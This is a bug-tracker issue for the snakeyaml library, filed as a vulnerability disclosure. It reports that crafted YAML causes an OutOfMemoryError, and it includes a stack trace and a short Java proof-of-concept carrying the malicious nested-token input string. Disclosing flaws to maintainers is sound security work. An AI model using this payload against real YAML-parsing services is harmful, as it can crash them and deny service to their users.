1. snakeyaml Avatar snakeyaml
  2. snakeyaml
  3. snakeyaml
  4. Issues

OutOfMemoryError when parsing yaml data

Issue #1064 resolved
郭逸帆 created an issue

Description

Those using Snake-yaml to parse untrusted yaml data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack.

Error Log

Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    at java.util.Arrays.copyOf(Arrays.java:3332)
    at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
    at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:448)
    at java.lang.StringBuilder.append(StringBuilder.java:142)
    at org.yaml.snakeyaml.nodes.MappingNode.toString(MappingNode.java:93)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.MappingNode.toString(MappingNode.java:82)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)

PoC

// PoC.java
import org.yaml.snakeyaml.Yaml;

import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.io.InputStreamReader;

/**
 * Poc
 *
 * @since 1.0.0
 */
public class Poc {
    public static void test(String data) {
        String datastring = data;
        try (InputStream datastream = new ByteArrayInputStream(datastring.getBytes());
             InputStreamReader reader = new InputStreamReader(datastream, "UTF-8");) {

            Yaml yaml = new Yaml();
            yaml.loadAs(reader, String.class);
        } catch (Exception e) {
        }
    }

    public static void main(String[] args) {
        test(" ? - - ? - - ? ? - - ? ? ? - - ? ? - - ? ? ? - - ? ? - ? ? - - ? - - ? ? ? - - ? ? - ?  -? - ? ? - - ? - - ? ? ? - - ? ? - ?  -? - ? ? - - ? - ");
    }
}

References

https://github.com/snakeyaml/snakeyaml/blob/0048722933b13dd922371bb19cd4172df2203194/src/main/java/org/yaml/snakeyaml/nodes/SequenceNode.java#L65

Comments (4)

  5. Log in to comment
Assignee
Type
bug
Priority
minor
Status
resolved
Votes
0
Watchers
1
Jira: the preferred issue tracker for Bitbucket. Join the team!